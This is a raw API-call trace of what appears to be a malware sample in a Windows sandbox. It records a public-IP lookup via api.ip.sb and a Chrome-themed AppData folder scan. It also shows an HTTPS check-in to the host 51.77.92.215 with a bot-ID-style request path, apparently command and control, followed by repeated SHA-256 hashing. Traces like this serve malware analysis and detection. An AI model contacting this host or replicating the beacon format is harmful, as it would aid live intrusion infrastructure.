	[0102.468] WriteFile (in: hFile=0x258, lpBuffer=0x1288e0*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x1288e0*, lpNumberOfBytesWritten=0x1288f0*=0x2, lpOverlapped=0x0) returned 1
	[0102.468] WriteFile (in: hFile=0x258, lpBuffer=0x128904*, nNumberOfBytesToWrite=0x17, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x128904*, lpNumberOfBytesWritten=0x1288f0*=0x17, lpOverlapped=0x0) returned 1
	[0102.468] WriteFile (in: hFile=0x258, lpBuffer=0x1288e0*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x1288e0*, lpNumberOfBytesWritten=0x1288f0*=0x2, lpOverlapped=0x0) returned 1
	[0102.468] WriteFile (in: hFile=0x258, lpBuffer=0x128904*, nNumberOfBytesToWrite=0x1d, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x128904*, lpNumberOfBytesWritten=0x1288f0*=0x1d, lpOverlapped=0x0) returned 1
	[0102.469] WriteFile (in: hFile=0x258, lpBuffer=0x1288e0*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x1288e0*, lpNumberOfBytesWritten=0x1288f0*=0x2, lpOverlapped=0x0) returned 1
	[0102.469] WriteFile (in: hFile=0x258, lpBuffer=0x128904*, nNumberOfBytesToWrite=0x2a, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x128904*, lpNumberOfBytesWritten=0x1288f0*=0x2a, lpOverlapped=0x0) returned 1
	[0102.469] WriteFile (in: hFile=0x258, lpBuffer=0x1288e0*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1288f0, lpOverlapped=0x0 | out: lpBuffer=0x1288e0*, lpNumberOfBytesWritten=0x1288f0*=0x2, lpOverlapped=0x0) returned 1
	[0102.485] CloseHandle (hObject=0x258) returned 1
	[0102.487] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x244200) returned 1
	[0102.487] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x24d028) returned 1
	[0102.487] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x24d028
	[0102.487] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1294e4 | out: lpSystemTimeAsFileTime=0x1294e4*(dwLowDateTime=0x26e81220, dwHighDateTime=0x1d50a6a)) 
	[0102.487] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x2457e0
	[0102.487] WinHttpConnect (hSession=0x2457e0, pswzServerName="api.ip.sb", nServerPort=0x1bb, dwReserved=0x0) returned 0x244828
	[0102.542] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x24c4b0
	[0102.542] WinHttpSetTimeouts (hInternet=0x2457e0, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0102.542] WinHttpOpenRequest (hConnect=0x244828, pwszVerb="GET", pwszObjectName="/ip", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x24a3b8
	[0102.542] WinHttpSetOption (hInternet=0x24a3b8, dwOption=0x1f, lpBuffer=0x1292e4, dwBufferLength=0x4) returned 1
	[0102.542] WinHttpSendRequest (hRequest=0x24a3b8, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0103.055] WinHttpReceiveResponse (hRequest=0x24a3b8, lpReserved=0x0) returned 1
	[0103.056] WinHttpQueryHeaders (in: hRequest=0x24a3b8, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x1292d4, lpdwBufferLength=0x1292d0, lpdwIndex=0x0 | out: lpBuffer=0x1292d4*, lpdwBufferLength=0x1292d0*=0x4, lpdwIndex=0x0) returned 1
	[0103.056] WinHttpQueryDataAvailable (in: hRequest=0x24a3b8, lpdwNumberOfBytesAvailable=0x1292d8 | out: lpdwNumberOfBytesAvailable=0x1292d8*=0xe) returned 1
	[0103.057] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ace38
	[0103.057] WinHttpReadData (in: hRequest=0x24a3b8, lpBuffer=0x22ace38, dwNumberOfBytesToRead=0xe, lpdwNumberOfBytesRead=0x1292d0 | out: lpBuffer=0x22ace38*, lpdwNumberOfBytesRead=0x1292d0*=0xe) returned 1
	[0103.057] WinHttpQueryDataAvailable (in: hRequest=0x24a3b8, lpdwNumberOfBytesAvailable=0x1292d8 | out: lpdwNumberOfBytesAvailable=0x1292d8*=0x0) returned 1
	[0103.058] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x22ace38, cbMultiByte=13, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 13
	[0103.058] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22a8908
	[0103.058] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x22ace38, cbMultiByte=13, lpWideCharStr=0x22a8908, cchWideChar=13 | out: lpWideCharStr="84.182.248.91") returned 13
	[0103.058] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x22ace38) returned 1
	[0103.058] WinHttpCloseHandle (hInternet=0x24a3b8) returned 1
	[0103.058] WinHttpCloseHandle (hInternet=0x244828) returned 1
	[0103.058] WinHttpCloseHandle (hInternet=0x2457e0) returned 1
	[0103.058] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x24c4b0) returned 1
	[0103.058] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1294e4 | out: lpSystemTimeAsFileTime=0x1294e4*(dwLowDateTime=0x273b6240, dwHighDateTime=0x1d50a6a)) 
	[0103.058] GetFullPathNameW (in: lpFileName="Data\\", nBufferLength=0x105, lpBuffer=0x129128, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\", lpFilePart=0x0) returned 0x36
	[0103.059] PathAddBackslashW (in: pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\" | out: pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\") returned=""
	[0103.059] FindFirstFileW (in: lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\*.*", lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x260ab240, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x260ab240, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x260ab240, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x10, dwReserved1=0x279a28, cFileName=".", cAlternateFileName="")) returned 0x213ab0
	[0103.059] FindNextFileW (in: hFindFile=0x213ab0, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x260ab240, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x260ab240, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x260ab240, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x10, dwReserved1=0x279a28, cFileName="..", cAlternateFileName="")) returned 1
	[0103.059] FindNextFileW (in: hFindFile=0x213ab0, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x260ab240, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x260ab240, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x260ab240, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x10, dwReserved1=0x279a28, cFileName="..", cAlternateFileName="")) returned 0
	[0103.059] GetLastError () returned 0x12
	[0103.059] FindClose (in: hFindFile=0x213ab0 | out: hFindFile=0x213ab0) returned 1
	[0103.059] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xd72380, lpParameter=0x1ec308, dwCreationFlags=0x0, lpThreadId=0x129b20 | out: lpThreadId=0x129b20*=0x9e4) returned 0x258
	[0103.060] WinHttpConnect (hSession=0x1f2598, pswzServerName="51.77.92.215", nServerPort=0x1bb, dwReserved=0x0) returned 0x227d8a0
	[0103.060] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x24c190
	[0103.060] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1294f4 | out: lpSystemTimeAsFileTime=0x1294f4*(dwLowDateTime=0x273b6240, dwHighDateTime=0x1d50a6a)) 
	[0103.060] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x30) returned 0x22a5b60
	[0103.060] WinHttpSetTimeouts (hInternet=0x1f2598, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0103.060] WinHttpOpenRequest (hConnect=0x227d8a0, pwszVerb="GET", pwszObjectName="/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/5/spk/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x24a3b8
	[0103.060] WinHttpSetOption (hInternet=0x24a3b8, dwOption=0x1f, lpBuffer=0x128af0, dwBufferLength=0x4) returned 1
	[0103.060] WinHttpSendRequest (hRequest=0x24a3b8, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0118.431] WinHttpReceiveResponse (hRequest=0x24a3b8, lpReserved=0x0) returned 1
	[0118.431] WinHttpQueryHeaders (in: hRequest=0x24a3b8, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x128ae0, lpdwBufferLength=0x128adc, lpdwIndex=0x0 | out: lpBuffer=0x128ae0*, lpdwBufferLength=0x128adc*=0x4, lpdwIndex=0x0) returned 1
	[0118.431] WinHttpQueryDataAvailable (in: hRequest=0x24a3b8, lpdwNumberOfBytesAvailable=0x128ae4 | out: lpdwNumberOfBytesAvailable=0x128ae4*=0xe0) returned 1
	[0118.432] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0xe0) returned 0x22c4dc0
	[0118.432] WinHttpReadData (in: hRequest=0x24a3b8, lpBuffer=0x22c4dc0, dwNumberOfBytesToRead=0xe0, lpdwNumberOfBytesRead=0x128adc | out: lpBuffer=0x22c4dc0*, lpdwNumberOfBytesRead=0x128adc*=0xe0) returned 1
	[0118.432] WinHttpQueryDataAvailable (in: hRequest=0x24a3b8, lpdwNumberOfBytesAvailable=0x128ae4 | out: lpdwNumberOfBytesAvailable=0x128ae4*=0x0) returned 1
	[0118.432] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ad240
	[0118.432] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x1000) returned 0x26b6770
	[0118.432] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.434] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.434] CryptHashData (hHash=0x213a70, pbData=0x26b6770, dwDataLen=0x20, dwFlags=0x0) returned 1
	[0118.434] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.434] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22a8a70
	[0118.434] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x22a8a70, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22a8a70, pdwDataLen=0x129364) returned 1
	[0118.434] CryptDestroyHash (hHash=0x213a70) returned 1
	[0118.434] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.435] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.436] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.436] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0x40, dwFlags=0x0) returned 1
	[0118.436] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.436] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22a8ac0
	[0118.436] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22a8ac0, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22a8ac0, pdwDataLen=0x129364) returned 1
	[0118.436] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.436] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.436] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.437] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.437] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0x60, dwFlags=0x0) returned 1
	[0118.437] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.437] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22a89a8
	[0118.437] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22a89a8, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22a89a8, pdwDataLen=0x129364) returned 1
	[0118.437] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.437] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.437] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.438] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.438] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0x80, dwFlags=0x0) returned 1
	[0118.438] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.438] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22a8958
	[0118.438] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22a8958, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22a8958, pdwDataLen=0x129364) returned 1
	[0118.438] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.438] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.438] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.438] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.439] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0xa0, dwFlags=0x0) returned 1
	[0118.439] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.439] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22a9100
	[0118.439] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22a9100, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22a9100, pdwDataLen=0x129364) returned 1
	[0118.439] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.439] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.439] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.439] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.439] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0xc0, dwFlags=0x0) returned 1
	[0118.439] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.439] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22a9128
	[0118.439] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22a9128, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22a9128, pdwDataLen=0x129364) returned 1
	[0118.439] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.440] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.440] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.440] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.440] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0xe0, dwFlags=0x0) returned 1
	[0118.440] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.440] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22a9150
	[0118.440] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22a9150, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22a9150, pdwDataLen=0x129364) returned 1
	[0118.440] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.440] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.440] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.441] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.441] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0x100, dwFlags=0x0) returned 1
	[0118.441] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.441] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22a9178
	[0118.441] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22a9178, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22a9178, pdwDataLen=0x129364) returned 1
	[0118.441] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.441] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.441] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.442] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.442] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0x120, dwFlags=0x0) returned 1
	[0118.442] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.442] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22a91a0
	[0118.442] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22a91a0, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22a91a0, pdwDataLen=0x129364) returned 1
	[0118.442] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.442] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.442] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.443] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.443] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0x140, dwFlags=0x0) returned 1
	[0118.443] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.443] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22a91c8
	[0118.443] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22a91c8, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22a91c8, pdwDataLen=0x129364) returned 1
	[0118.443] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.443] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.443] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.444] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.444] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0x160, dwFlags=0x0) returned 1
	[0118.444] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.444] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22a91f0
	[0118.444] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22a91f0, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22a91f0, pdwDataLen=0x129364) returned 1
	[0118.444] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.444] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.444] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.444] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.444] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0x180, dwFlags=0x0) returned 1
	[0118.444] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.445] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22a9218
	[0118.445] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22a9218, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22a9218, pdwDataLen=0x129364) returned 1
	[0118.445] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.445] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.445] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.445] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.445] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0x1a0, dwFlags=0x0) returned 1
	[0118.445] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.445] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22a9240
	[0118.445] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22a9240, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22a9240, pdwDataLen=0x129364) returned 1
	[0118.445] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.445] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.445] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.446] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.446] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0x1c0, dwFlags=0x0) returned 1
	[0118.446] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.446] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22a9268
	[0118.446] CryptGetHashParam (in: hHash=0x22b65c0, dwParam=0x2, pbData=0x22a9268, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22a9268, pdwDataLen=0x129364) returned 1
	[0118.446] CryptDestroyHash (hHash=0x22b65c0) returned 1
	[0118.446] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.446] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.446] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.446] CryptHashData (hHash=0x22b6600, pbData=0x26b6770, dwDataLen=0x1e0, dwFlags=0x0) returned 1
	[0118.446] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x4, pbData=0x129364, pdwDataLen=0x129360, dwFlags=0x0 | out: pbData=0x129364, pdwDataLen=0x129360) returned 1
	[0118.446] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x22a9290
	[0118.446] CryptGetHashParam (in: hHash=0x22b6600, dwParam=0x2, pbData=0x22a9290, pdwDataLen=0x129364, dwFlags=0x0 | out: pbData=0x22a9290, pdwDataLen=0x129364) returned 1
	[0118.446] CryptDestroyHash (hHash=0x22b6600) returned 1
	[0118.446] CryptReleaseContext (hProv=0x225528, dwFlags=0x0) returned 1
	[0118.446] CryptAcquireContextW (in: phProv=0x129368, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129368*=0x225528) returned 1
	[0118.447] CryptCreateHash (in: hProv=0x225528, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x12936c | out: phHash=0x12936c) returned 1
	[0118.447] CryptHashData (hHash=0x22b65c0, pbData=0x26b6770, dwDataLen=0x200, dwFlags=0x0) returned 1
